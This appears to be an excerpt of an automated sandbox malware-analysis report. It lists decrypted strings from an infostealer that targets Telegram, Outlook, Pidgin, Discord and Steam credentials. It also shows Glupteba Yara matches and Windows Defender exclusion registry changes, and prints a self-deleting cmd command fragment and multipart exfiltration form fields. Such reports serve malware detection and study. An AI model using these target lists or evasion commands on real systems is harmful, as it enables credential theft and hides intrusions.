                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Local Storage\leveldb
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Telegram Desktop\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: key_datas
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: D877F783D5D3EF8C*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: map*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: A7FDF864FBC10B77*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: A92DAA6EA6F891F2*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: F8806DD0C461824F*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Telegram
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: *.tox
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: *.ini
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Password
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000001
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000002
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000003
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000004
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Outlook\accounts.txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Pidgin
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \.purple\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: accounts.xml
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: dQw4w9WgXcQ
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: token:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Valve\Steam
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SteamPath
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \config\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ssfn*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: config.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DialogConfig.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: libraryfolders.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: loginusers.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Steam\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: browsers
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: done
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: soft
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Discord\tokens.txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: https
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: POST
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HTTP/1.1
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Content-Disposition: form-data; name="
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: hwid
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: build
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: token
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: file_name
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: file
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: message
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: screenshot.jpg

                        Bitcoin Miner

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR

                        Compliance

                        barindex
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeUnpacked PE file: 4.2.VtmtVe55Jwcf3rOGIU1yezyh.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeUnpacked PE file: 11.2.yPlMO3UKyKRvoEYPhbGYOyT0.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeUnpacked PE file: 19.2.B46afLBMY0mokUgVdA9CQR52.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeUnpacked PE file: 21.2.t7IXQJi6R3tWUMJ8f9cQzMWm.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeUnpacked PE file: 27.2.H6XhhPCeuwAb2QQK3C3B1Lwl.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeUnpacked PE file: 29.2.l0nXYBHJHVq6UHyy1YDO9fn3.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeUnpacked PE file: 34.2.6dpl9L7LbyabhVQNXZXXKjGL.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeUnpacked PE file: 39.2.ikL90ODaFTS7N6FbOffM2D1B.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeUnpacked PE file: 41.2.G3pV8gTsWQBVrGpK4ooPrlxI.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213748763.log
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213755078.log
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: appidpolicyconverter.pdbOGPS source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: XC:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xuzajoraxiy_20\kolazuto93\rimixosugixe lerofulugo\d.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444036361.000000000418C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1446288176.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1450570795.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448867855.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1449341280.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004221000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.000000000417B000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041EC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448071216.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004203000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006C5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: hh.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: hh.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xopuxokusi 56_texag poxibivo\tajicewudok\gosicuk_84\cifafu.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484213650.0000000004B63000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483831434.00000000041CC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: appidpolicyconverter.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: GC:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: &SC:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp
                        Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: C:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006F69000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp

                        Change of critical system settings

                        barindex
                        Adds extensions / path to Windows Defender exclusion list (Registry)
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041D9E1 FindFirstFileExA,4_2_0041D9E1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0041D9E1 FindFirstFileExA,11_2_0041D9E1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BCDC48 FindFirstFileExA,11_2_05BCDC48
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0041D9E1 FindFirstFileExA,19_2_0041D9E1
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CFDC48 FindFirstFileExA,19_2_05CFDC48
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0041D9E1 FindFirstFileExA,21_2_0041D9E1
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041DDC48 FindFirstFileExA,21_2_041DDC48
